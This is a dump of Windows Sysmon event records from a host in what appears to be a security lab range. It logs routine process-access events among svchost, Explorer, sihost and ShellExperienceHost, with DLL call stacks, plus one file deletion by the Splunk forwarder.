12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.782{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.642{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.642{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7895657F2881B50E61279DF2BF0E137,SHA256=2EE53E1B6C2DD7C98D0B28C02C8794847154192B6E430F3253FB402B6FAF1BF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
